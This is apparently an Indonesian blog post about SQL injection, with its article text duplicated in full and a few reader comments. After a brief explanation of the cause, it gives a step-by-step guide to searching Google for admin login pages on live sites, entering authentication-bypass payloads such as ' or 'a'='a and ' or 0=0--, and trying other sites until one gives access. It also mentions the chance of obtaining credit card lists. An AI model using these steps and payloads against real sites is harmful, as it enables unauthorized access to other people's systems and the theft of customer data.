Setelah baca2 sebuah buku yang berjudul SQL INJECTION. jadi ga sabar untuk memposting artikel ini. Ok artikel kali ini saya akan mengulas sedikit tentang SQL INJECTION dan HACK DENGAN SQL INJECTION. Pertama-tama, sekali lagi saya tekankan. Disini penulis hanya ingin membagi sebuah informasi yang ada. Dan hanya untuk menambah sebuah pengetahuan saja. Disini penulis tidak bertanggung jawab kalau seandainya artikel ini di implementasikan dengan maksud yang kurang baik.
SQL INJECTION????
> SQL injection adalah suatu teknik yang dapat dilakukan oleh cracker untuk dapat masuk kedalam system administrator tanpa mengetahui username dan password administrator terlebih dahulu dengan memanfaatkan perintah-perintah SQL yang dimasukkan kedalam database mesin server.
- SEBAB TERJADINYA
> Tidak adanya penanganan terhadap karakter – karakter tanda petik satu dan juga karakter double minus yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL. Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
- KARAKTERISTIK
> Teknik serangan ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account. Selain itu, SQL Injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data-data yang berada didalam database. Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
- IMPLEMENTASI SQL INJECTION
> Masuk ke google atau Search Engine yang lain
> Masukan salah satu keyword berikut
> "/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
(anda bisa menambahi sendiri dan sesuaikan keinginan anda)
> Setelah itu bukalah satu link yang ditemukan oleh google. Kemungkinan anda akan menjumpai sebuah halaman login (user name dan password).
> Kemudian masukan kode berikut :
username: ' or 'a'='a
password: ' or 'a'='a (termasuk tanda petiknya)
> Jika berhasil, kemungkinan anda akan masuk ke admin panel, dimana anda bisa menambahkan berita, mengedit user yang lain, merubah about DLL. Jika beruntung anda bisa mendapatkan daftar kredit card yang banyak.
> Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
> Banyak variasi kode yang mungkin, antara lain :
username: admin
password: ' or 'a'='a
atau bisa dimasukkan kedua-duanya misal :
' or 0=0-- ; " or 0=0--; or0=0--; ' or0=0#;
" or0=0 #; 'or'x'='x ; "or"x"="x ; ') or ('x'='x
> Cobalah sampai berhasil hingga anda bisa masuk ke admin panel.
(PERINGATAN : Jangan sekali-kali meubah apapun ketika berhasil masuk ke system database, karena termasuk kriminal dan mudah untuk di telusuri)
Sekian dulu artikel kali ini. Sampai bertemu di artikel selanjutnya.
Terima kasih.
SQL INJECTION????
> SQL injection adalah suatu teknik yang dapat dilakukan oleh cracker untuk dapat masuk kedalam system administrator tanpa mengetahui username dan password administrator terlebih dahulu dengan memanfaatkan perintah-perintah SQL yang dimasukkan kedalam database mesin server.
- SEBAB TERJADINYA
> Tidak adanya penanganan terhadap karakter – karakter tanda petik satu dan juga karakter double minus yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL. Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
- KARAKTERISTIK
> Teknik serangan ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account. Selain itu, SQL Injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data-data yang berada didalam database. Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
- IMPLEMENTASI SQL INJECTION
> Masuk ke google atau Search Engine yang lain
> Masukan salah satu keyword berikut
> "/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
(anda bisa menambahi sendiri dan sesuaikan keinginan anda)
> Setelah itu bukalah satu link yang ditemukan oleh google. Kemungkinan anda akan menjumpai sebuah halaman login (user name dan password).
> Kemudian masukan kode berikut :
username: ' or 'a'='a
password: ' or 'a'='a (termasuk tanda petiknya)
> Jika berhasil, kemungkinan anda akan masuk ke admin panel, dimana anda bisa menambahkan berita, mengedit user yang lain, merubah about DLL. Jika beruntung anda bisa mendapatkan daftar kredit card yang banyak.
> Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
> Banyak variasi kode yang mungkin, antara lain :
username: admin
password: ' or 'a'='a
atau bisa dimasukkan kedua-duanya misal :
' or 0=0-- ; " or 0=0--; or0=0--; ' or0=0#;
" or0=0 #; 'or'x'='x ; "or"x"="x ; ') or ('x'='x
> Cobalah sampai berhasil hingga anda bisa masuk ke admin panel.
(PERINGATAN : Jangan sekali-kali meubah apapun ketika berhasil masuk ke system database, karena termasuk kriminal dan mudah untuk di telusuri)
Sekian dulu artikel kali ini. Sampai bertemu di artikel selanjutnya.
Terima kasih.
2 komentar:
pertamax gan...
wah masih hangat nih artikel..heheee...
langsung oprek gan..
mluncur TKP...
wih mantp brur, keren2...
Posting Komentar
Silahkan tinggalkan JEJAK disini. TERIMA KASIH.